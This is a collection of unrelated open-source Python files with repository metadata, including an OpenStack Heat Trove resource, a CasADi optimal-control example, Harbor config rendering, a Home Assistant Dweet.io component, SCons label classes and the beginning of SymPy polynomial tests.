for usr in prop_diff[self.USERS]:
if usr[self.USER_NAME] not in current:
usr['ACTION'] = self.CREATE
for usr in current:
if usr not in desired:
prop_diff[self.USERS].append({self.USER_NAME: usr,
'ACTION': self.DELETE})
updates.update({self.USERS: prop_diff[self.USERS]})
return updates
def check_update_complete(self, updates):
instance = self.client().instances.get(self.resource_id)
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.status,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if updates:
if instance.status != self.ACTIVE:
dmsg = ("Instance is in status %(now)s. Waiting on status"
" %(stat)s")
LOG.debug(dmsg % {"now": instance.status,
"stat": self.ACTIVE})
return False
try:
return (
self._update_name(instance, updates.get(self.NAME)) and
self._update_flavor(instance, updates.get(self.FLAVOR)) and
self._update_size(instance, updates.get(self.SIZE)) and
self._update_databases(instance,
updates.get(self.DATABASES)) and
self._update_users(instance, updates.get(self.USERS))
)
except Exception as exc:
if self.client_plugin().is_client_exception(exc):
# the instance could have updated between the time
# we retrieve it and try to update it so check again
if self.client_plugin().is_over_limit(exc):
LOG.debug("API rate limit: %(ex)s. Retrying.",
{'ex': str(exc)})
return False
if "No change was requested" in str(exc):
LOG.warning("Unexpected instance state change "
"during update. Retrying.")
return False
raise
return True
def _update_name(self, instance, name):
if name and instance.name != name:
self.client().instances.edit(instance, name=name)
return False
return True
def _update_flavor(self, instance, new_flavor):
if new_flavor:
current_flav = str(instance.flavor['id'])
new_flav = str(new_flavor)
if new_flav != current_flav:
dmsg = "Resizing instance flavor from %(old)s to %(new)s"
LOG.debug(dmsg % {"old": current_flav, "new": new_flav})
self.client().instances.resize_instance(instance, new_flavor)
return False
return True
def _update_size(self, instance, new_size):
if new_size and instance.volume['size'] != new_size:
dmsg = "Resizing instance storage from %(old)s to %(new)s"
LOG.debug(dmsg % {"old": instance.volume['size'],
"new": new_size})
self.client().instances.resize_volume(instance, new_size)
return False
return True
def _update_databases(self, instance, databases):
if databases:
for db in databases:
if db.get("ACTION") == self.CREATE:
db.pop("ACTION", None)
dmsg = "Adding new database %(db)s to instance"
LOG.debug(dmsg % {"db": db})
self.client().databases.create(instance, [db])
elif db.get("ACTION") == self.DELETE:
dmsg = ("Deleting existing database %(db)s from "
"instance")
LOG.debug(dmsg % {"db": db['name']})
self.client().databases.delete(instance, db['name'])
return True
def _update_users(self, instance, users):
if users:
for usr in users:
dbs = [{'name': db} for db in usr.get(self.USER_DATABASES,
[])]
usr[self.USER_DATABASES] = dbs
if usr.get("ACTION") == self.CREATE:
usr.pop("ACTION", None)
dmsg = "Adding new user %(u)s to instance"
LOG.debug(dmsg % {"u": usr})
self.client().users.create(instance, [usr])
elif usr.get("ACTION") == self.DELETE:
dmsg = ("Deleting existing user %(u)s from "
"instance")
LOG.debug(dmsg % {"u": usr['name']})
self.client().users.delete(instance, usr['name'])
else:
newattrs = {}
if usr.get(self.USER_HOST):
newattrs[self.USER_HOST] = usr[self.USER_HOST]
if usr.get(self.USER_PASSWORD):
newattrs[self.USER_PASSWORD] = usr[self.USER_PASSWORD]
if newattrs:
self.client().users.update_attributes(
instance,
usr['name'], newuserattr=newattrs,
hostname=instance.hostname)
current = self.client().users.get(instance,
usr[self.USER_NAME])
dbs = [db['name'] for db in current.databases]
desired = [db['name'] for db in
usr.get(self.USER_DATABASES, [])]
grants = [db for db in desired if db not in dbs]
revokes = [db for db in dbs if db not in desired]
if grants:
self.client().users.grant(instance,
usr[self.USER_NAME],
grants)
if revokes:
self.client().users.revoke(instance,
usr[self.USER_NAME],
revokes)
return True
def parse_live_resource_data(self, resource_properties, resource_data):
"""A method to parse live resource data to update current resource.
NOTE: cannot update users from live resource data in case of
impossibility to get required user password.
"""
dbs = [d.name for d in self.client().databases.list(self.resource_id)]
dbs_reality = []
for resource_db in resource_properties[self.DATABASES]:
if resource_db[self.DATABASE_NAME] in dbs:
dbs_reality.append(resource_db)
dbs.remove(resource_db[self.DATABASE_NAME])
# cannot get any property for databases except for name, so update
# resource with name
dbs_reality.extend([{self.DATABASE_NAME: db} for db in dbs])
result = {self.NAME: resource_data.get('name'),
self.DATABASES: dbs_reality}
if resource_data.get('flavor') is not None:
result[self.FLAVOR] = resource_data['flavor'].get('id')
if resource_data.get('volume') is not None:
result[self.SIZE] = resource_data['volume']['size']
return result
def handle_delete(self):
"""Delete a cloud database instance."""
if not self.resource_id:
return
try:
instance = self.client().instances.get(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
else:
instance.delete()
return instance.id
def check_delete_complete(self, instance_id):
"""Check for completion of cloud DB instance deletion."""
if not instance_id:
return True
try:
# For some time trove instance may continue to live
self._refresh_instance(instance_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
return True
return False
def validate(self):
"""Validate any of the provided params."""
res = super(Instance, self).validate()
if res:
return res
datastore_type = self.properties[self.DATASTORE_TYPE]
datastore_version = self.properties[self.DATASTORE_VERSION]
self.client_plugin().validate_datastore(
datastore_type, datastore_version,
self.DATASTORE_TYPE, self.DATASTORE_VERSION)
# check validity of user and databases
users = self.properties[self.USERS]
if users:
databases = self.properties[self.DATABASES]
if not databases:
msg = _('Databases property is required if users property '
'is provided for resource %s.') % self.name
raise exception.StackValidationFailed(message=msg)
db_names = set([db[self.DATABASE_NAME] for db in databases])
for user in users:
missing_db = [db_name for db_name in user[self.USER_DATABASES]
if db_name not in db_names]
if missing_db:
msg = (_('Database %(dbs)s specified for user does '
'not exist in databases for resource %(name)s.')
% {'dbs': missing_db, 'name': self.name})
raise exception.StackValidationFailed(message=msg)
# check validity of NICS
is_neutron = self.is_using_neutron()
nics = self.properties[self.NICS]
for nic in nics:
if not is_neutron and nic.get(self.PORT):
msg = _("Can not use %s property on Nova-network.") % self.PORT
raise exception.StackValidationFailed(message=msg)
if bool(nic.get(self.NET)) == bool(nic.get(self.PORT)):
msg = _("Either %(net)s or %(port)s must be provided.") % {
'net': self.NET, 'port': self.PORT}
raise exception.StackValidationFailed(message=msg)
def href(self):
if not self._href and self.dbinstance:
if not self.dbinstance.links:
self._href = None
else:
for link in self.dbinstance.links:
if link['rel'] == 'self':
self._href = link[self.HREF]
break
return self._href
def _resolve_attribute(self, name):
if self.resource_id is None:
return
if name == self.HOSTNAME:
return self.dbinstance.hostname
elif name == self.HREF:
return self.href()
def resource_mapping():
return {
'OS::Trove::Instance': Instance,
}
|
openstack/heat
|
heat/engine/resources/openstack/trove/instance.py
|
Python
|
apache-2.0
| 29,344
| 0
|
#!/usr/bin/python
import re
import csv
import os
import json
def read_csv(fn):
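    # Aggregate the 'Total Transactions' and 'Time used' columns per result
    # type and derive Throughput = Total Transactions / Time used.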
results = {}
with open(fn, 'rb') as csvfile:
rows = csv.reader(csvfile, delimiter=',')
for row in rows:
m = re.search('Total Transactions', row[1])
if len(row) == 7 and m:
temp = results.get(row[0])
if not temp:
results[row[0]] = {row[1]: float(row[2]), row[3]: float(row[4])}
else:
results[row[0]] = {row[1]: float(row[2]) + temp.get(row[1]),
row[3]: float(row[4]) + temp.get(row[3])}
results[row[0]]['Throughput'] = results[row[0]][row[1]] / results[row[0]][row[3]]
return results
def traverse_all_csvs(path_to_dir):
files = []
for (dirpath, dirnames, filenames) in os.walk(path_to_dir):
for fn in filenames:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
if m:
files.append(fn)
break
return files
if __name__ == '__main__':
results = {}
files = traverse_all_csvs(os.path.dirname(os.path.realpath(__file__)))
for fn in files:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
results[m.group(1)] = read_csv(fn)
print json.dumps(results, indent=4, separators=(',', ': '))
with open('compilation.json', 'w') as outfile:
json.dump(results, outfile, sort_keys=True, indent=4, separators=(',', ': '))
rows = [['Type', 'Total Transactions', 'Time used', 'Throughput']]
for key, value in results.iteritems():
rows.append([key, '-', '-', '-'])
for k1, v1 in value.iteritems():
rows.append([k1, v1['Total Transactions'], v1['Time used'], v1['Throughput']])
with open('compilation.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerows(rows)
|
franklingu/Cassandra-benchmarking
|
benchmarking/sum_up.py
|
Python
|
mit
| 1,889
| 0.004764
|
# Copyright (C) 2017,2019, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw
# This file is part of Nicotb.
# Nicotb is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Nicotb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Nicotb. If not, see <http://www.gnu.org/licenses/>.
from nicotb.common import *
from collections import deque
event_released = set()
waiting_coro = list()
event_queue = deque()
def CreateEvent(hier: str = ""):
if event_released:
n = event_released.pop()
else:
n = len(waiting_coro)
waiting_coro.append(list())
if COSIM and hier:
BindEvent(n, (TOP_PREFIX+hier).encode())
return n
def CreateEvents(descs: list):
return [CreateEvent(event) for event in descs]
def GetEvent(ev):
return ev if isinstance(ev, int) else CreateEvent(ev)
def SignalEvent(ev, all_ev=True):
event_queue.append((ev, all_ev))
def DestroyEvent(ev: int):
# Do not destroy events created with hier name
waiting_coro[ev] = list()
event_released.add(ev)
# Initialize a default event, so coroutines can implement SystemC-like dont_initialize
INIT_EVENT = CreateEvent()
SignalEvent(INIT_EVENT)
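# Illustrative usage (a sketch, not part of the original module):
#   ev = CreateEvent("dut.clk")  # under COSIM this also binds TOP_PREFIX + "dut.clk"
#   SignalEvent(ev)              # queue (ev, all_ev=True) for dispatch
#   DestroyEvent(ev)             # recycle the slot once nothing waits on it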
|
johnjohnlin/nicotb
|
lib/event.py
|
Python
|
gpl-3.0
| 1,550
| 0.013548
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved.
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# -*- coding: utf-8 -*-
import os
import sys
from numpy import *
import numpy as NP
import matplotlib.pyplot as plt
import zipfile
# JModelica
from jmodelica.jmi import compile_jmu
from jmodelica.jmi import JMUModel
import jmodelica
# CasADi
from casadi import *
curr_dir = os.path.dirname(os.path.abspath(__file__));
try:
# Try the old Jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_xml':False})
except jmodelica.compiler.UnknownOptionError:
# Try the new jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_me_xml':False})
if True:
vdp = JMUModel(jmu_name)
res = vdp.optimize()
# Extract variable profiles
x1=res['x1']
x2=res['x2']
u=res['u']
t=res['time']
cost=res['cost']
# Plot
plt.figure(1)
plt.clf()
plt.subplot(311)
plt.plot(t,x1)
plt.grid()
plt.ylabel('x1')
plt.subplot(312)
plt.plot(t,x2)
plt.grid()
plt.ylabel('x2')
plt.subplot(313)
plt.plot(t,u)
plt.grid()
plt.ylabel('u')
plt.xlabel('time')
sfile = zipfile.ZipFile(curr_dir+'/VDP_pack_VDP_Opt.jmu','r')
mfile = sfile.extract('modelDescription.xml','.')
os.remove('VDP_pack_VDP_Opt.jmu')
os.rename('modelDescription.xml','vdp.xml')
# Allocate a parser and load the xml
parser = FMIParser('vdp.xml')
# Dump representation to screen
print "XML representation"
print parser
# Obtain the symbolic representation of the OCP
ocp = parser.parse()
# Print the ocp to screen
print ocp
# Sort the variables according to type
var = OCPVariables(ocp.variables)
# The right hand side of the ACADO functions
acado_in = ACADO_FCN_NUM_IN * [[]]
# Time
acado_in[ACADO_FCN_T] = [var.t_]
# Convert stl vector of variables to list of expressions
def toList(v, der=False):
ret = []
for i in v:
if der:
ret.append(i.der())
else:
ret.append(i.var())
return ret
# Differential state
acado_in[ACADO_FCN_XD] = toList(ocp.x_)
# Algebraic state
acado_in[ACADO_FCN_XA] = toList(ocp.z_)
# Control
acado_in[ACADO_FCN_U] = toList(ocp.u_)
# Parameter
acado_in[ACADO_FCN_P] = toList(ocp.p_)
# State derivative
acado_in[ACADO_FCN_XDOT] = toList(ocp.x_,True)
# The DAE function
ffcn_out = list(ocp.dae) + list(ocp.ae)
ffcn = SXFunction(acado_in,[ffcn_out])
# Objective function
mfcn = SXFunction(acado_in,[ocp.mterm])
# Path constraint function
cfcn = SXFunction(acado_in,[ocp.cfcn])
# Initial constraint function
rfcn = SXFunction(acado_in,[ocp.initeq])
# Create ACADO solver
ocp_solver = AcadoInterface(ffcn,mfcn,cfcn,rfcn)
# Create an integrator
dae_in = DAE_NUM_IN * [[]]
dae_in[DAE_T] = acado_in[ACADO_FCN_T]
dae_in[DAE_Y] = acado_in[ACADO_FCN_XD] + acado_in[ACADO_FCN_XA]
dae_in[DAE_YDOT] = acado_in[ACADO_FCN_XDOT] + list(ssym("zdot",len(acado_in[ACADO_FCN_XA])))
dae_in[DAE_P] = acado_in[ACADO_FCN_P] + acado_in[ACADO_FCN_U]
dae = SXFunction(dae_in,[ffcn_out])
integrator = IdasIntegrator(dae)
#integrator.setOption("exact_jacobian",True)
#integrator.setOption("linear_multistep_method","bdf") # adams or bdf
#integrator.setOption("nonlinear_solver_iteration","newton") # newton or functional
integrator.setOption("number_of_fwd_dir",4)
integrator.setOption("number_of_adj_dir",0)
integrator.setOption("fsens_err_con",True)
integrator.setOption("quad_err_con",True)
integrator.setOption("abstol",1e-8)
integrator.setOption("reltol",1e-8)
integrator.setOption("is_differential",len(acado_in[ACADO_FCN_XD])*[1] + len(acado_in[ACADO_FCN_XA])*[0])
# Pass the integrator to ACADO
ocp_solver.setIntegrator(integrator)
# Set options
ocp_solver.setOption("start_time",ocp.t0)
ocp_solver.setOption("final_time",ocp.tf)
num_nodes = 30
ocp_solver.setOption("number_of_shooting_nodes",num_nodes)
ocp_solver.setOption("max_num_iterations",100)
ocp_solver.setOption("kkt_tolerance",1e-4)
ocp_solver.setOption("integrator","casadi")
ocp_solver.setOption("integrator_tolerance",1e-6)
# Initialize
ocp_solver.init()
# Set bounds on states
cfcn_lb = []
for i in ocp.cfcn_lb:
cfcn_lb.append(float(i))
ocp_solver.setInput(cfcn_lb,"lbc")
cfcn_ub = []
for i in ocp.cfcn_ub:
cfcn_ub.append(float(i))
ocp_solver.setInput(cfcn_ub,"ubc")
# Solve the optimal control problem
ocp_solver.solve()
# Print optimal cost
cost = ocp_solver.getOutputData(ACADO_COST)[0]
print "optimal cost = ", cost
# Print optimal parameters
popt = ocp_solver.getOutputData(ACADO_P_OPT)
print "optimal parameter values = ", popt
# Time grid
t_opt = NP.linspace(0,ocp.tf,num_nodes+1)
# Plot optimal control
u_opt = ocp_solver.getOutputData(ACADO_U_OPT)
plt.figure(3)
plt.plot(t_opt,u_opt)
# Plot optimal state trajectory
x_opt = ocp_solver.getOutputData(ACADO_X_OPT)
x_opt = array(x_opt) # create numpy array
x_opt = x_opt.reshape(num_nodes+1, 3)
plt.figure(4)
plt.plot(t_opt,x_opt)
# Show the plots
plt.ion()
plt.show()
|
jgillis/casadi
|
experimental/joel/vdp/vdp.py
|
Python
|
lgpl-3.0
| 5,909
| 0.019293
|
"""empty message
Revision ID: 4fe34588268f
Revises: 26dba2ff3e74
Create Date: 2014-12-09 01:41:24.333058
"""
# revision identifiers, used by Alembic.
revision = '4fe34588268f'
down_revision = '26dba2ff3e74'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
|
sandeep6189/Pmp-Webapp
|
migrations/versions/4fe34588268f_.py
|
Python
|
bsd-3-clause
| 506
| 0.011858
|
import os
from g import config_dir, templates_dir, DEFAULT_GID, DEFAULT_UID
from utils.misc import prepare_dir
from utils.jinja import render_jinja
registryctl_config_dir = os.path.join(config_dir, "registryctl")
registryctl_config_template_path = os.path.join(templates_dir, "registryctl", "config.yml.jinja")
registryctl_conf = os.path.join(config_dir, "registryctl", "config.yml")
registryctl_env_template_path = os.path.join(templates_dir, "registryctl", "env.jinja")
registryctl_conf_env = os.path.join(config_dir, "registryctl", "env")
levels_map = {
'debug': 'debug',
'info': 'info',
'warning': 'warn',
'error': 'error',
'fatal': 'fatal'
}
def prepare_registry_ctl(config_dict):
# prepare dir
prepare_dir(registryctl_config_dir)
# Render Registryctl env
render_jinja(
registryctl_env_template_path,
registryctl_conf_env,
**config_dict)
# Render Registryctl config
render_jinja(
registryctl_config_template_path,
registryctl_conf,
uid=DEFAULT_UID,
gid=DEFAULT_GID,
level=levels_map[config_dict['log_level']],
**config_dict)
|
wy65701436/harbor
|
make/photon/prepare/utils/registry_ctl.py
|
Python
|
apache-2.0
| 1,152
| 0.002604
|
import time
import test_rnd as rnd
import random
import pysos
# initialize the data
N = 1234
items = [(rnd.utf8(20), rnd.utf8(200)) for i in range(N)]
start = time.time()
db = pysos.Dict('temp/sos_dict')
#import shelve
#db = shelve.open('temp.shelve')
print("%.2fs: %d items loaded" % (time.time() - start, len(db)))
# add all items
for key,val in items:
db[key] = val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# update all values
random.shuffle(items)
for key,val in items:
db[key] = 'updated ' + val
print("%.2fs: %d items updated" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == 'updated ' + val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# delete all keys
random.shuffle(items)
for key,val in items:
del db[key]
print("%.2fs: %d items deleted" % (time.time() - start, len(items)))
# add all keys
random.shuffle(items)
for key,val in items:
db[key] ='again ' + val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val = db[key]
print("%.2fs: %d items read" % (time.time() - start, len(items)))
N = len(db)
db.close()
print("%.2fs: DB closed containing %d item" % (time.time() - start, N))
#print("free lines: %d" % len(db._free_lines))
|
dagnelies/pysos
|
test_dict.py
|
Python
|
apache-2.0
| 1,567
| 0.007658
|
import sys
import argparse
import pickle
def read_index(pickleFile):
pickleFile = open(pickleFile, 'rb')
index = pickle.load(pickleFile)
return index
def main(args):
wordIndex = read_index('indice.pickle')
docIndex = read_index('indice_doc.pickle')
wordList = args.palabras
for word in wordList:
print wordIndex[word]
# print docIndex
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Busca palabras')
parser.add_argument('palabras', metavar='N', type=str, nargs='+', help='Palabras a buscar en el indice')
args = parser.parse_args()
main(args)
|
chrisRubiano/TAP
|
indexing/buscar.py
|
Python
|
gpl-3.0
| 633
| 0.00158
|
"""
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import EVENT_STATE_CHANGED, STATE_UNKNOWN
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dweet"
DEPENDENCIES = []
REQUIREMENTS = ['dweepy==0.2.0']
CONF_NAME = 'name'
CONF_WHITELIST = 'whitelist'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
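# Illustrative configuration.yaml entry matching the schema above
# (the entity id is hypothetical):
#
#   dweet:
#     name: my-home-assistant
#     whitelist: sensor.living_room_temperature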
# pylint: disable=too-many-locals
def setup(hass, config):
"""Setup the Dweet.io component."""
conf = config[DOMAIN]
name = conf[CONF_NAME]
whitelist = conf.get(CONF_WHITELIST, [])
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
|
mikaelboman/home-assistant
|
homeassistant/components/dweet.py
|
Python
|
mit
| 1,961
| 0
|
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')
@classmethod
def make_label(cls, label_str):
package_str = None
target_str = None
if not isinstance(label_str, str):
# Assume it is a SCons File node.
label_str = label_str.srcnode().path
package_str, target_str = os.path.split(label_str)
elif label_str.startswith('#'):
label_str = label_str[1:]
if ':' in label_str:
package_str, target_str = label_str.split(':', 1)
else:
package_str = label_str
elif label_str.startswith(':'):
target_str = label_str[1:]
else:
target_str = label_str
package_name = PackageName.make_package_name(package_str)
if not target_str:
target_str = os.path.basename(package_name.path)
target_name = TargetName(target_str)
return cls(package_name, target_name)
@classmethod
def make_label_list(cls, label_strs):
if isinstance(label_strs, str):
label_strs = label_strs.split()
return [cls.make_label(label_str) for label_str in label_strs]
@staticmethod
def check_name(name):
if not name:
raise ValueError('empty name')
if name.startswith('/') or name.endswith('/'):
raise ValueError('leading or trailing path separator: %s' % name)
if '//' in name:
raise ValueError('consecutive path separators: %s' % name)
if not Label.VALID_NAME.match(name):
raise ValueError('invalid name character: %s' % name)
def __init__(self, package_name, target_name):
assert isinstance(package_name, PackageName)
assert isinstance(target_name, TargetName)
self.package_name = package_name
self.target_name = target_name
def __str__(self):
return '#%s:%s' % (self.package_name, self.target_name)
def __repr__(self):
return '%s("%s")' % (self.__class__.__name__, str(self))
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
pass
class LabelOfFile(Label):
pass
class PackageName(object):
@classmethod
def make_package_name(cls, package_str=None):
assert package_str is None or isinstance(package_str, str)
if not package_str:
package_str = Dir('.').srcnode().path
return cls(package_str)
def __init__(self, package_name):
assert isinstance(package_name, str)
Label.check_name(package_name)
self.package_name = package_name
def __str__(self):
return self.package_name
def __repr__(self):
return 'PackageName("%s")' % self.package_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.package_name)
@property
def path(self):
return self.package_name
class TargetName(object):
def __init__(self, target_name):
assert isinstance(target_name, str)
Label.check_name(target_name)
self.target_name = target_name
def __str__(self):
return self.target_name
def __repr__(self):
return 'TargetName("%s")' % self.target_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.target_name)
@property
def path(self):
return self.target_name
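# Illustrative usage (a sketch, not part of the original module): a label
# string of the form '#package/path:target' splits into a PackageName and a
# TargetName, e.g.
#   lbl = Label.make_label('#third_party/zlib:zlib')
#   str(lbl)  -> '#third_party/zlib:zlib'
#   lbl.path  -> 'third_party/zlib/zlib'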
|
clchiou/scons_package
|
label.py
|
Python
|
mit
| 4,231
| 0
|
"""Tests for user-friendly public interface to polynomial functions. """
from sympy.polys.polytools import (
Poly, PurePoly, poly,
parallel_poly_from_expr,
degree, degree_list,
LC, LM, LT,
pdiv, prem, pquo, pexquo,
div, rem, quo, exquo,
half_gcdex, gcdex, invert,
subresultants,
resultant, discriminant,
terms_gcd, cofactors,
gcd, gcd_list,
lcm, lcm_list,
trunc,
monic, content, primitive,
compose, decompose,
sturm,
gff_list, gff,
sqf_norm, sqf_part, sqf_list, sqf,
factor_list, factor,
intervals, refine_root, count_roots,
real_roots, nroots, ground_roots,
nth_power_roots_poly,
cancel, reduced, groebner,
GroebnerBasis, is_zero_dimensional,
_torational_factor_list,
to_rational_coeffs)
from sympy.polys.polyerrors import (
MultivariatePolynomialError,
ExactQuotientFailed,
PolificationFailed,
ComputationFailed,
UnificationFailed,
RefinementFailed,
GeneratorsNeeded,
GeneratorsError,
PolynomialError,
CoercionFailed,
DomainError,
OptionError,
FlagError)
from sympy.polys.polyclasses import DMP
from sympy.polys.fields import field
from sympy.polys.domains import FF, ZZ, QQ, RR, EX
from sympy.polys.domains.realfield import RealField
from sympy.polys.orderings import lex, grlex, grevlex
from sympy import (
S, Integer, Rational, Float, Mul, Symbol, sqrt, Piecewise,
exp, sin, tanh, expand, oo, I, pi, re, im, RootOf, Eq, Tuple, Expr)
from sympy.core.basic import _aresame
from sympy.core.compatibility import iterable
from sympy.core.mul import _keep_coeff
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, d, p, q, t, w, x, y, z
from sympy import MatrixSymbol
def _epsilon_eq(a, b):
for x, y in zip(a, b):
if abs(x - y) > 1e-10:
return False
return True
def _strict_eq(a, b):
if type(a) == type(b):
if iterable(a):
if len(a) == len(b):
return all(_strict_eq(c, d) for c, d in zip(a, b))
else:
return False
else:
return isinstance(a, Poly) and a.eq(b, strict=True)
else:
return False
def test_Poly_from_dict():
K = FF(3)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{0: 1, 1: 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict({(0, 0): 1, (1, 1): 2}, gens=(
x, y), domain=K).rep == DMP([[K(2), K(0)], [K(1)]], K)
assert Poly.from_dict({0: 1, 1: 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict({(1,): sin(y)}, gens=x, composite=False) == \
Poly(sin(y)*x, x, domain='EX')
assert Poly.from_dict({(1,): y}, gens=x, composite=False) == \
Poly(y*x, x, domain='EX')
assert Poly.from_dict({(1, 1): 1}, gens=(x, y), composite=False) == \
Poly(x*y, x, y, domain='ZZ')
assert Poly.from_dict({(1, 0): y}, gens=(x, z), composite=False) == \
Poly(y*x, x, z, domain='EX')
def test_Poly_from_list():
K = FF(3)
assert Poly.from_list([2, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([5, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([2, 1], gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([2, 1], gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([0, 1.0], gens=x).rep == DMP([RR(1.0)], RR)
assert Poly.from_list([1.0, 0], gens=x).rep == DMP([RR(1.0), RR(0.0)], RR)
raises(MultivariatePolynomialError, lambda: Poly.from_list([[]], gens=(x, y)))
def test_Poly_from_poly():
f = Poly(x + 7, x, domain=ZZ)
g = Poly(x + 2, x, modulus=3)
h = Poly(x + y, x, y, domain=ZZ)
K = FF(3)
assert Poly.from_poly(f) == f
assert Poly.from_poly(f, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=x) == f
assert Poly.from_poly(f, gens=x, domain=K).rep == DMP([K(1), K(1)], K)
